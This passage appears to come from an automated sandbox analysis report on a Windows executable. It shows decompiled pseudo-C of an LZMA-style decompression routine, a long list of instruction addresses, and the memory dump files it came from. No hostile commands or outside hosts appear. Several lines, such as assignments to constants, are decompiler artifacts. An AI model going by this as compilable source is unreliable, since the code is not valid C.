                                                          							__esi = __edx + __eax;
                                                          							 *(__ebp - 0x54) = __esi;
                                                          							__ax =  *__esi;
                                                          							__edi = __ax & 0x0000ffff;
                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          							__eflags =  *(__ebp - 0xc) - __ecx;
                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          								__cx = __ax;
                                                          								__cx = __ax >> 5;
                                                          								__eax = __eax - __ecx;
                                                          								__edx = __edx + 1;
                                                          								__eflags = __edx;
                                                          								 *__esi = __ax;
                                                          								 *(__ebp - 0x50) = __edx;
                                                          							} else {
                                                          								 *(__ebp - 0x10) = __ecx;
                                                          								0x800 = 0x800 - __edi;
                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                          								goto L148;
                                                          							} else {
                                                          								goto L146;
                                                          							}
                                                          						case 0x19:
                                                          							__eflags = __ebx - 4;
                                                          							if(__ebx < 4) {
                                                          								 *(__ebp - 0x2c) = __ebx;
                                                          								L119:
                                                          								_t393 = __ebp - 0x2c;
                                                          								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                          								__eflags =  *_t393;
                                                          								L120:
                                                          								__eax =  *(__ebp - 0x2c);
                                                          								__eflags = __eax;
                                                          								if(__eax == 0) {
                                                          									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                          									goto L170;
                                                          								}
                                                          								__eflags = __eax -  *(__ebp - 0x60);
                                                          								if(__eax >  *(__ebp - 0x60)) {
                                                          									goto L171;
                                                          								}
                                                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                          								__eax =  *(__ebp - 0x30);
                                                          								_t400 = __ebp - 0x60;
                                                          								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                          								__eflags =  *_t400;
                                                          								goto L123;
                                                          							}
                                                          							__ecx = __ebx;
                                                          							__eax = __ebx;
                                                          							__ecx = __ebx >> 1;
                                                          							__eax = __ebx & 0x00000001;
                                                          							__ecx = (__ebx >> 1) - 1;
                                                          							__al = __al | 0x00000002;
                                                          							__eax = (__ebx & 0x00000001) << __cl;
                                                          							__eflags = __ebx - 0xe;
                                                          							 *(__ebp - 0x2c) = __eax;
                                                          							if(__ebx >= 0xe) {
                                                          								__ebx = 0;
                                                          								 *(__ebp - 0x48) = __ecx;
                                                          								L102:
                                                          								__eflags =  *(__ebp - 0x48);
                                                          								if( *(__ebp - 0x48) <= 0) {
                                                          									__eax = __eax + __ebx;
                                                          									 *(__ebp - 0x40) = 4;
                                                          									 *(__ebp - 0x2c) = __eax;
                                                          									__eax =  *(__ebp - 4);
                                                          									__eax =  *(__ebp - 4) + 0x644;
                                                          									__eflags = __eax;
                                                          									L108:
                                                          									__ebx = 0;
                                                          									 *(__ebp - 0x58) = __eax;
                                                          									 *(__ebp - 0x50) = 1;
                                                          									 *(__ebp - 0x44) = 0;
                                                          									 *(__ebp - 0x48) = 0;
                                                          									L112:
                                                          									__eax =  *(__ebp - 0x40);
                                                          									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                          										_t391 = __ebp - 0x2c;
                                                          										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                          										__eflags =  *_t391;
                                                          										goto L119;
                                                          									}
                                                          									__eax =  *(__ebp - 0x50);
                                                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          									__eax =  *(__ebp - 0x58);
                                                          									__esi = __edi + __eax;
                                                          									 *(__ebp - 0x54) = __esi;
                                                          									__ax =  *__esi;
                                                          									__ecx = __ax & 0x0000ffff;
                                                          									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                          									__eflags =  *(__ebp - 0xc) - __edx;
                                                          									if( *(__ebp - 0xc) >= __edx) {
                                                          										__ecx = 0;
                                                          										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                          										__ecx = 1;
                                                          										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                          										__ebx = 1;
                                                          										__ecx =  *(__ebp - 0x48);
                                                          										__ebx = 1 << __cl;
                                                          										__ecx = 1 << __cl;
                                                          										__ebx =  *(__ebp - 0x44);
                                                          										__ebx =  *(__ebp - 0x44) | __ecx;
                                                          										__cx = __ax;
                                                          										__cx = __ax >> 5;
                                                          										__eax = __eax - __ecx;
                                                          										__edi = __edi + 1;
                                                          										__eflags = __edi;
                                                          										 *(__ebp - 0x44) = __ebx;
                                                          										 *__esi = __ax;
                                                          										 *(__ebp - 0x50) = __edi;
                                                          									} else {
                                                          										 *(__ebp - 0x10) = __edx;
                                                          										0x800 = 0x800 - __ecx;
                                                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                          										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          										 *__esi = __dx;
                                                          									}
                                                          									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          									if( *(__ebp - 0x10) >= 0x1000000) {
                                                          										L111:
                                                          										_t368 = __ebp - 0x48;
                                                          										 *_t368 =  *(__ebp - 0x48) + 1;
                                                          										__eflags =  *_t368;
                                                          										goto L112;
                                                          									} else {
                                                          										goto L109;
                                                          									}
                                                          								}
                                                          								__ecx =  *(__ebp - 0xc);
                                                          								__ebx = __ebx + __ebx;
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                          								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          								 *(__ebp - 0x44) = __ebx;
                                                          								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                          									__ecx =  *(__ebp - 0x10);
                                                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          									__ebx = __ebx | 0x00000001;
                                                          									__eflags = __ebx;
                                                          									 *(__ebp - 0x44) = __ebx;
                                                          								}
                                                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          								if( *(__ebp - 0x10) >= 0x1000000) {
                                                          									L101:
                                                          									_t338 = __ebp - 0x48;
                                                          									 *_t338 =  *(__ebp - 0x48) - 1;
                                                          									__eflags =  *_t338;
                                                          									goto L102;
                                                          								} else {
                                                          									goto L99;
                                                          								}
                                                          							}
                                                          							__edx =  *(__ebp - 4);
                                                          							__eax = __eax - __ebx;
                                                          							 *(__ebp - 0x40) = __ecx;
                                                          							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                          							goto L108;
                                                          						case 0x1a:
                                                          							goto L55;
                                                          						case 0x1b:
                                                          							L75:
                                                          							__eflags =  *(__ebp - 0x64);
                                                          							if( *(__ebp - 0x64) == 0) {
                                                          								 *(__ebp - 0x88) = 0x1b;
                                                          								goto L170;
                                                          							}
                                                          							__eax =  *(__ebp - 0x14);
                                                          							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          							__eflags = __eax -  *(__ebp - 0x74);
                                                          							if(__eax >=  *(__ebp - 0x74)) {
                                                          								__eax = __eax +  *(__ebp - 0x74);
                                                          								__eflags = __eax;
                                                          							}
                                                          							__edx =  *(__ebp - 8);
                                                          							__cl =  *(__eax + __edx);
                                                          							__eax =  *(__ebp - 0x14);
                                                          							 *(__ebp - 0x5c) = __cl;
                                                          							 *(__eax + __edx) = __cl;
                                                          							__eax = __eax + 1;
                                                          							__edx = 0;
                                                          							_t274 = __eax %  *(__ebp - 0x74);
                                                          							__eax = __eax /  *(__ebp - 0x74);
                                                          							__edx = _t274;
                                                          							__eax =  *(__ebp - 0x68);
                                                          							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          							_t283 = __ebp - 0x64;
                                                          							 *_t283 =  *(__ebp - 0x64) - 1;
                                                          							__eflags =  *_t283;
                                                          							 *( *(__ebp - 0x68)) = __cl;
                                                          							goto L79;
                                                          						case 0x1c:
                                                          							while(1) {
                                                          								L123:
                                                          								__eflags =  *(__ebp - 0x64);
                                                          								if( *(__ebp - 0x64) == 0) {
                                                          									break;
                                                          								}
                                                          								__eax =  *(__ebp - 0x14);
                                                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          								__eflags = __eax -  *(__ebp - 0x74);
                                                          								if(__eax >=  *(__ebp - 0x74)) {
                                                          									__eax = __eax +  *(__ebp - 0x74);
                                                          									__eflags = __eax;
                                                          								}
                                                          								__edx =  *(__ebp - 8);
                                                          								__cl =  *(__eax + __edx);
                                                          								__eax =  *(__ebp - 0x14);
                                                          								 *(__ebp - 0x5c) = __cl;
                                                          								 *(__eax + __edx) = __cl;
                                                          								__eax = __eax + 1;
                                                          								__edx = 0;
                                                          								_t414 = __eax %  *(__ebp - 0x74);
                                                          								__eax = __eax /  *(__ebp - 0x74);
                                                          								__edx = _t414;
                                                          								__eax =  *(__ebp - 0x68);
                                                          								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                          								__eflags =  *(__ebp - 0x30);
                                                          								 *( *(__ebp - 0x68)) = __cl;
                                                          								 *(__ebp - 0x14) = __edx;
                                                          								if( *(__ebp - 0x30) > 0) {
                                                          									continue;
                                                          								} else {
                                                          									goto L80;
                                                          								}
                                                          							}
                                                          							 *(__ebp - 0x88) = 0x1c;
                                                          							goto L170;
                                                          					}
                                                          				}
                                                          			}













                                                          0x00000000
                                                          0x00406d5f
                                                          0x00406d5f
                                                          0x00406d64
                                                          0x00406ddb
                                                          0x00406de2
                                                          0x00406dec
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073d4
                                                          0x004073da
                                                          0x004073e0
                                                          0x004073fa
                                                          0x004073fd
                                                          0x00407403
                                                          0x0040740e
                                                          0x00407410
                                                          0x004073e2
                                                          0x004073e2
                                                          0x004073f1
                                                          0x004073f5
                                                          0x004073f5
                                                          0x0040741a
                                                          0x00407441
                                                          0x00407441
                                                          0x00407447
                                                          0x00407447
                                                          0x00000000
                                                          0x0040741c
                                                          0x0040741c
                                                          0x00407420
                                                          0x004075cf
                                                          0x00000000
                                                          0x004075cf
                                                          0x0040742c
                                                          0x00407433
                                                          0x0040743b
                                                          0x0040743e
                                                          0x00000000
                                                          0x0040743e
                                                          0x00406d66
                                                          0x00406d66
                                                          0x00406d6a
                                                          0x00406d72
                                                          0x00406d75
                                                          0x00406d77
                                                          0x00406d7a
                                                          0x00406d7c
                                                          0x00406d81
                                                          0x00406d84
                                                          0x00406d8b
                                                          0x00406d92
                                                          0x00406d95
                                                          0x00406da0
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406daf
                                                          0x00406dcd
                                                          0x00406dcf
                                                          0x00406fa2
                                                          0x00406fa2
                                                          0x00406fa5
                                                          0x00406fa8
                                                          0x00406fab
                                                          0x00406fae
                                                          0x00406fb1
                                                          0x00406fb4
                                                          0x00406fb7
                                                          0x00406fba
                                                          0x00406fc0
                                                          0x00406fd8
                                                          0x00406fdb
                                                          0x00406fde
                                                          0x00406fe1
                                                          0x00406fe1
                                                          0x00406fe4
                                                          0x00406fea
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fca
                                                          0x00406fcf
                                                          0x00406fd1
                                                          0x00406fd3
                                                          0x00406fd3
                                                          0x00406ff4
                                                          0x00406ff7
                                                          0x00406f9a
                                                          0x00406fa0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00406f75
                                                          0x00406f79
                                                          0x00407581
                                                          0x00000000
                                                          0x00407581
                                                          0x00406f7f
                                                          0x00406f82
                                                          0x00406f85
                                                          0x00406f89
                                                          0x00406f8c
                                                          0x00406f92
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f97
                                                          0x00000000
                                                          0x00406f97
                                                          0x00406db1
                                                          0x00406db1
                                                          0x00406db4
                                                          0x00406dba
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbf
                                                          0x00406dc2
                                                          0x00406dc4
                                                          0x00406dc5
                                                          0x00406dc8
                                                          0x00406e35
                                                          0x00406e35
                                                          0x00406e39
                                                          0x00406e3c
                                                          0x00406e3f
                                                          0x00406e42
                                                          0x00406e45
                                                          0x00406e46
                                                          0x00406e49
                                                          0x00406e4b
                                                          0x00406e51
                                                          0x00406e54
                                                          0x00406e57
                                                          0x00406e5a
                                                          0x00406e5d
                                                          0x00406e63
                                                          0x00406e7f
                                                          0x00406e82
                                                          0x00406e85
                                                          0x00406e88
                                                          0x00406e8f
                                                          0x00406e95
                                                          0x00406e99
                                                          0x00406e65
                                                          0x00406e65
                                                          0x00406e69
                                                          0x00406e71
                                                          0x00406e76
                                                          0x00406e78
                                                          0x00406e7a
                                                          0x00406e7a
                                                          0x00406ea3
                                                          0x00406ea6
                                                          0x00406e1d
                                                          0x00406e1d
                                                          0x00406e23
                                                          0x00406ed6
                                                          0x00406edc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ede
                                                          0x00406ee1
                                                          0x00406ee4
                                                          0x00406ee7
                                                          0x00406eea
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef3
                                                          0x00406ef6
                                                          0x00406efc
                                                          0x00406f14
                                                          0x00406f17
                                                          0x00406f1a
                                                          0x00406f1d
                                                          0x00406f1d
                                                          0x00406f20
                                                          0x00406f26
                                                          0x00406efe
                                                          0x00406efe
                                                          0x00406f06
                                                          0x00406f0b
                                                          0x00406f0d
                                                          0x00406f0f
                                                          0x00406f0f
                                                          0x00406f30
                                                          0x00406f33
                                                          0x00406eb1
                                                          0x00406eb5
                                                          0x00407575
                                                          0x00000000
                                                          0x00407575
                                                          0x00406ebb
                                                          0x00406ebe
                                                          0x00406ec1
                                                          0x00406ec5
                                                          0x00406ec8
                                                          0x00406ece
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed3
                                                          0x00406ed3
                                                          0x00406f33
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3e
                                                          0x00406f3e
                                                          0x00406f41
                                                          0x00406f44
                                                          0x00406f48
                                                          0x0040758d
                                                          0x00000000
                                                          0x0040758d
                                                          0x00406f4e
                                                          0x00406f51
                                                          0x00406f54
                                                          0x00406f57
                                                          0x00406f5a
                                                          0x00406f5d
                                                          0x00406f60
                                                          0x00406f62
                                                          0x00406f65
                                                          0x00406f68
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x0040710a
                                                          0x0040710a
                                                          0x0040710d
                                                          0x0040710d
                                                          0x00000000
                                                          0x0040710d
                                                          0x00406e2f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406eac
                                                          0x00406df8
                                                          0x00406dfc
                                                          0x00407569
                                                          0x004075e5
                                                          0x004075ed
                                                          0x004075f4
                                                          0x004075f6
                                                          0x004075fd
                                                          0x00407601
                                                          0x00407601
                                                          0x00406e02
                                                          0x00406e05
                                                          0x00406e08
                                                          0x00406e0c
                                                          0x00406e0f
                                                          0x00406e15
                                                          0x00406e17
                                                          0x00406e17
                                                          0x00406e1a
                                                          0x00000000
                                                          0x00406e1a
                                                          0x00406ea6
                                                          0x00406daf
                                                          0x00406be3
                                                          0x00406be3
                                                          0x00406bec
                                                          0x004075fa
                                                          0x004075fa
                                                          0x00000000
                                                          0x004075fa
                                                          0x00406bf2
                                                          0x00000000
                                                          0x00406bfd
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c06
                                                          0x00406c09
                                                          0x00406c0c
                                                          0x00406c10
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c16
                                                          0x00406c19
                                                          0x00406c1b
                                                          0x00406c1c
                                                          0x00406c1f
                                                          0x00406c21
                                                          0x00406c22
                                                          0x00406c24
                                                          0x00406c27
                                                          0x00406c2c
                                                          0x00406c31
                                                          0x00406c3a
                                                          0x00406c4d
                                                          0x00406c50
                                                          0x00406c5c
                                                          0x00406c84
                                                          0x00406c86
                                                          0x00406c94
                                                          0x00406c94
                                                          0x00406c98
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c88
                                                          0x00406c8b
                                                          0x00406c8c
                                                          0x00406c8c
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c62
                                                          0x00406c67
                                                          0x00406c67
                                                          0x00406c70
                                                          0x00406c78
                                                          0x00406c7b
                                                          0x00000000
                                                          0x00406c81
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c9e
                                                          0x00406c9e
                                                          0x00406ca2
                                                          0x0040754e
                                                          0x00000000
                                                          0x0040754e
                                                          0x00406cab
                                                          0x00406cbb
                                                          0x00406cbe
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc4
                                                          0x00406cc8
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cca
                                                          0x00406cd0
                                                          0x00406cfa
                                                          0x00406d00
                                                          0x00406d07
                                                          0x00000000
                                                          0x00406d07
                                                          0x00406cd6
                                                          0x00406cd9
                                                          0x00406cde
                                                          0x00406cde
                                                          0x00406ce9
                                                          0x00406cf1
                                                          0x00406cf4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d39
                                                          0x00406d3f
                                                          0x00406d42
                                                          0x00406d4f
                                                          0x00406d57
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d0e
                                                          0x00406d0e
                                                          0x00406d12
                                                          0x0040755d
                                                          0x00000000
                                                          0x0040755d
                                                          0x00406d1e
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d2c
                                                          0x00406d2f
                                                          0x00406d32
                                                          0x00406d37
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ffe
                                                          0x00407002
                                                          0x00407020
                                                          0x00407023
                                                          0x0040702a
                                                          0x0040702d
                                                          0x00407030
                                                          0x00407033
                                                          0x00407036
                                                          0x00407039
                                                          0x0040703b
                                                          0x00407042
                                                          0x00407043
                                                          0x00407045
                                                          0x00407048
                                                          0x0040704b
                                                          0x0040704e
                                                          0x0040704e
                                                          0x00407053
                                                          0x00000000
                                                          0x00407053
                                                          0x00407004
                                                          0x00407007
                                                          0x0040700a
                                                          0x00407014
                                                          0x00000000
                                                          0x00000000
                                                          0x00407068
                                                          0x0040706c
                                                          0x0040708f
                                                          0x00407092
                                                          0x00407095
                                                          0x0040709f
                                                          0x0040706e
                                                          0x0040706e
                                                          0x00407071
                                                          0x00407074
                                                          0x00407077
                                                          0x00407084
                                                          0x00407087
                                                          0x00407087
                                                          0x00000000
                                                          0x00000000
                                                          0x004070ab
                                                          0x004070af
                                                          0x00000000
                                                          0x00000000
                                                          0x004070b5
                                                          0x004070b9
                                                          0x00000000
                                                          0x00000000
                                                          0x004070bf
                                                          0x004070c1
                                                          0x004070c5
                                                          0x004070c5
                                                          0x004070c8
                                                          0x004070cc
                                                          0x00000000
                                                          0x00000000
                                                          0x0040711c
                                                          0x00407120
                                                          0x00407127
                                                          0x0040712a
                                                          0x0040712d
                                                          0x00407137
                                                          0x00000000
                                                          0x00407137
                                                          0x00407122
                                                          0x00000000
                                                          0x00000000
                                                          0x00407143
                                                          0x00407147
                                                          0x0040714e
                                                          0x00407151
                                                          0x00407154
                                                          0x00407149
                                                          0x00407149
                                                          0x00407149
                                                          0x00407157
                                                          0x0040715a
                                                          0x0040715d
                                                          0x0040715d
                                                          0x00407160
                                                          0x00407163
                                                          0x00407166
                                                          0x00407166
                                                          0x00407169
                                                          0x00407170
                                                          0x00407175
                                                          0x00000000
                                                          0x00000000
                                                          0x00407203
                                                          0x00407203
                                                          0x00407207
                                                          0x004075a5
                                                          0x00000000
                                                          0x004075a5
                                                          0x0040720d
                                                          0x00407210
                                                          0x00407213
                                                          0x00407217
                                                          0x0040721a
                                                          0x00407220
                                                          0x00407222
                                                          0x00407222
                                                          0x00407222
                                                          0x00407225
                                                          0x00407228
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407286
                                                          0x00407286
                                                          0x0040728a
                                                          0x004075b1
                                                          0x00000000
                                                          0x004075b1
                                                          0x00407290
                                                          0x00407293
                                                          0x00407296
                                                          0x0040729a
                                                          0x0040729d
                                                          0x004072a3
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00407056
                                                          0x00407056
                                                          0x00407059
                                                          0x00000000
                                                          0x00000000
                                                          0x00407395
                                                          0x00407399
                                                          0x004073bb
                                                          0x004073be
                                                          0x004073c8
                                                          0x00000000
                                                          0x004073c8
                                                          0x0040739b
                                                          0x0040739e
                                                          0x004073a2
                                                          0x004073a5
                                                          0x004073a5
                                                          0x004073a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00407452
                                                          0x00407456
                                                          0x00407474
                                                          0x00407474
                                                          0x00407474
                                                          0x0040747b
                                                          0x00407482
                                                          0x00407489
                                                          0x00407489
                                                          0x00000000
                                                          0x00407489
                                                          0x00407458
                                                          0x0040745b
                                                          0x0040745e
                                                          0x00407461
                                                          0x00407468
                                                          0x004073ac
                                                          0x004073ac
                                                          0x004073af
                                                          0x00000000
                                                          0x00000000
                                                          0x00407543
                                                          0x00407546
                                                          0x00000000
                                                          0x00000000
                                                          0x0040717d
                                                          0x0040717f
                                                          0x00407186
                                                          0x00407187
                                                          0x00407189
                                                          0x0040718c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407194
                                                          0x00407197
                                                          0x0040719a
                                                          0x0040719c
                                                          0x0040719e
                                                          0x0040719e
                                                          0x0040719f
                                                          0x004071a2
                                                          0x004071a9
                                                          0x004071ac
                                                          0x004071ba
                                                          0x00000000
                                                          0x00000000
                                                          0x00407490
                                                          0x00407490
                                                          0x00407493
                                                          0x0040749a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040749f
                                                          0x0040749f
                                                          0x004074a3
                                                          0x004075db
                                                          0x00000000
                                                          0x004075db
                                                          0x004074a9
                                                          0x004074ac
                                                          0x004074af
                                                          0x004074b3
                                                          0x004074b6
                                                          0x004074bc
                                                          0x004074be
                                                          0x004074be
                                                          0x004074be
                                                          0x004074c1
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c7
                                                          0x004074c7
                                                          0x004074cb
                                                          0x0040752b
                                                          0x0040752e
                                                          0x00407533
                                                          0x00407534
                                                          0x00407536
                                                          0x00407538
                                                          0x0040753b
                                                          0x00000000
                                                          0x0040753b
                                                          0x004074cd
                                                          0x004074d3
                                                          0x004074d6
                                                          0x004074d9
                                                          0x004074dc
                                                          0x004074df
                                                          0x004074e2
                                                          0x004074e5
                                                          0x004074e8
                                                          0x004074eb
                                                          0x004074ee
                                                          0x00407507
                                                          0x0040750a
                                                          0x0040750d
                                                          0x00407510
                                                          0x00407514
                                                          0x00407516
                                                          0x00407516
                                                          0x00407517
                                                          0x0040751a
                                                          0x004074f0
                                                          0x004074f0
                                                          0x004074f8
                                                          0x004074fd
                                                          0x004074ff
                                                          0x00407502
                                                          0x00407502
                                                          0x0040751d
                                                          0x00407524
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x004071c2
                                                          0x004071c5
                                                          0x004071fb
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732e
                                                          0x0040732e
                                                          0x00407331
                                                          0x00407333
                                                          0x004075bd
                                                          0x00000000
                                                          0x004075bd
                                                          0x00407339
                                                          0x0040733c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407342
                                                          0x00407346
                                                          0x00407349
                                                          0x00407349
                                                          0x00407349
                                                          0x00000000
                                                          0x00407349
                                                          0x004071c7
                                                          0x004071c9
                                                          0x004071cb
                                                          0x004071cd
                                                          0x004071d0
                                                          0x004071d1
                                                          0x004071d3
                                                          0x004071d5
                                                          0x004071d8
                                                          0x004071db
                                                          0x004071f1
                                                          0x004071f6
                                                          0x0040722e
                                                          0x0040722e
                                                          0x00407232
                                                          0x0040725e
                                                          0x00407260
                                                          0x00407267
                                                          0x0040726a
                                                          0x0040726d
                                                          0x0040726d
                                                          0x00407272
                                                          0x00407272
                                                          0x00407274
                                                          0x00407277
                                                          0x0040727e
                                                          0x00407281
                                                          0x004072ae
                                                          0x004072ae
                                                          0x004072b1
                                                          0x004072b4
                                                          0x00407328
                                                          0x00407328
                                                          0x00407328
                                                          0x00000000
                                                          0x00407328
                                                          0x004072b6
                                                          0x004072bc
                                                          0x004072bf
                                                          0x004072c2
                                                          0x004072c5
                                                          0x004072c8
                                                          0x004072cb
                                                          0x004072ce
                                                          0x004072d1
                                                          0x004072d4
                                                          0x004072d7
                                                          0x004072f0
                                                          0x004072f2
                                                          0x004072f5
                                                          0x004072f6
                                                          0x004072f9
                                                          0x004072fb
                                                          0x004072fe
                                                          0x00407300
                                                          0x00407302
                                                          0x00407305
                                                          0x00407307
                                                          0x0040730a
                                                          0x0040730e
                                                          0x00407310
                                                          0x00407310
                                                          0x00407311
                                                          0x00407314
                                                          0x00407317
                                                          0x004072d9
                                                          0x004072d9
                                                          0x004072e1
                                                          0x004072e6
                                                          0x004072e8
                                                          0x004072eb
                                                          0x004072eb
                                                          0x0040731a
                                                          0x00407321
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x00000000
                                                          0x00407323
                                                          0x00000000
                                                          0x00407323
                                                          0x00407321
                                                          0x00407234
                                                          0x00407237
                                                          0x00407239
                                                          0x0040723c
                                                          0x0040723f
                                                          0x00407242
                                                          0x00407244
                                                          0x00407247
                                                          0x0040724a
                                                          0x0040724a
                                                          0x0040724d
                                                          0x0040724d
                                                          0x00407250
                                                          0x00407257
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x00000000
                                                          0x00407259
                                                          0x00000000
                                                          0x00407259
                                                          0x00407257
                                                          0x004071dd
                                                          0x004071e0
                                                          0x004071e2
                                                          0x004071e5
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004070cf
                                                          0x004070cf
                                                          0x004070d3
                                                          0x00407599
                                                          0x00000000
                                                          0x00407599
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070df
                                                          0x004070e2
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e7
                                                          0x004070ea
                                                          0x004070ed
                                                          0x004070f0
                                                          0x004070f3
                                                          0x004070f6
                                                          0x004070f7
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070fc
                                                          0x004070ff
                                                          0x00407102
                                                          0x00407105
                                                          0x00407105
                                                          0x00407105
                                                          0x00407108
                                                          0x00000000
                                                          0x00000000
                                                          0x0040734c
                                                          0x0040734c
                                                          0x0040734c
                                                          0x00407350
                                                          0x00000000
                                                          0x00000000
                                                          0x00407356
                                                          0x00407359
                                                          0x0040735c
                                                          0x0040735f
                                                          0x00407361
                                                          0x00407361
                                                          0x00407361
                                                          0x00407364
                                                          0x00407367
                                                          0x0040736a
                                                          0x0040736d
                                                          0x00407370
                                                          0x00407373
                                                          0x00407374
                                                          0x00407376
                                                          0x00407376
                                                          0x00407376
                                                          0x00407379
                                                          0x0040737c
                                                          0x0040737f
                                                          0x00407382
                                                          0x00407385
                                                          0x00407389
                                                          0x0040738b
                                                          0x0040738e
                                                          0x00000000
                                                          0x00407390
                                                          0x00000000
                                                          0x00407390
                                                          0x0040738e
                                                          0x004075c3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
